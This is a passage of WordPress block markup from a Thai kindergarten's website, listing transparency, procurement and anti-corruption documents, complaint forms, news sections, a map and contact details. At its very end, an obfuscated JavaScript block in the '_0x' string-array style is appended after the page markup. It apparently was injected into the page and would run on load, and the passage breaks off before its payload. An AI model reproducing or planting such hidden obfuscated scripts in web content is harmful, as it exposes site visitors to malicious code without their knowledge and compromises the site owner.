900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 